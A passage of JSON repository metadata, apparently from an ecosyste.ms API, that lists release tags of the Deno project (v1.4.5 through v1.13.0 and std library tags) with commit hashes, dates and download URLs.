/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_par